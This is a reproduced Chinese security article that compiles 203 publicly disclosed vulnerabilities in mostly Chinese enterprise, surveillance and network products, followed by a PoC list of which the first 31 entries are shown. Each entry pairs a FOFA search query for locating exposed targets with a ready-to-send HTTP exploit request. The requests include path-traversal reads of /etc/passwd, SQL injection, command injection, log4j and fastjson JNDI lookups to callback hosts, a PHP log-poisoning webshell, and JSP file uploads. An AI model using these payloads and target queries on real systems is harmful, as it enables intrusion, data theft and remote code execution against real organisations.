Roundup of Publicly Disclosed Internet Vulnerabilities, 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is reproduced from 网络安全新视界; author: 网络安全新视界

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive-defensive exercises; we hope this article helps with your defense. Defenders can use its contents to check their own exposure.

Sources: This article covers 203 PoCs for high-severity vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All were collected from other public accounts or websites on the Internet and compiled for publication by the 网络安全新视界 team.

Patches: All vulnerabilities listed are public; for patches or remediation guidance, contact the product vendor.

Content: Due to length limits, a few PoCs that are too long have been replaced with the word PAYLOAD; search for the full PoC yourself if you need it.

Legal rights: If any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have the relevant content removed.

Notice:

To keep the process simple and easy to browse, we do not gate the full list behind "reply to get the full list". This article is the most complete version; to use it, press F12 and search for keywords.

Bookmark this article if you find it useful. You can also follow this public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. jshERP (华夏ERP) sensitive information disclosure
15. jshERP (华夏ERP) getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua (大华) DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo endpoint SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPtech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro (百卓) Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 privilege bypass
66. Wanhu (万户) ezOFFICE collaboration platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) mobile campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) traffic control router remote command execution
80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin (奇安信) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue combat dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload endpoint file upload
200. SeaCMS dmku SQL injection
201. Founder (方正) omnimedia news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC List

02

1. StarRocks MPP database unauthorized access
FOFA :title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA :title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA :title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA :title="EasyCVR"

Set password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA:title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor (深信服) NGAF arbitrary file read
FOFA:title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA:body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm (斐讯) router RCE
FOFA:icon_hash="-1344736688"
After logging in to the admin panel with the default account admin, perform:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA:app="Doccms"
GET /search/index.php?keyword… (remainder of the request line is missing from the source)
Host: x.x.x.x

The payload is the following statement, double URL-encoded:
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA:icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA:title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: executes the function, with base64 encoding.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to run the id command; the request header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r;
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA:app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. jshERP (华夏ERP) sensitive information disclosure
FOFA:body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. jshERP (华夏ERP) getAllList information disclosure
CVE-2024-0490
FOFA:body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA:title="HFOffice"
The PoC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua (大华) DSS itcBulletin SQL injection
FOFA:app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA:app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA:app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA:body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://DNSLOG"}
}""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

The fname field is taken as the server-side write path, so the .txt part is stored as the named .jsp under webapps/nc_web. Request /2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp afterwards and look for the marker string 2XpU7Y2Els1K9wZvOlSmrgolNci in the response.

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

The dsname value is handed to a JNDI lookup; a DNS or LDAP connection from the target to the dnslog host confirms it. Pointing the URL at an attacker-controlled LDAP server is what turns the lookup into code execution.

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

The groupid and fileType query parameters decide where the upload lands (the submitted filename is not used): the content is stored as head.jsp under the groupid directory and is reachable at
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

The injection point is the billitem query parameter; the file part can be empty.

31. Yonyou NC runStateServlet SQL injection
Version: <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
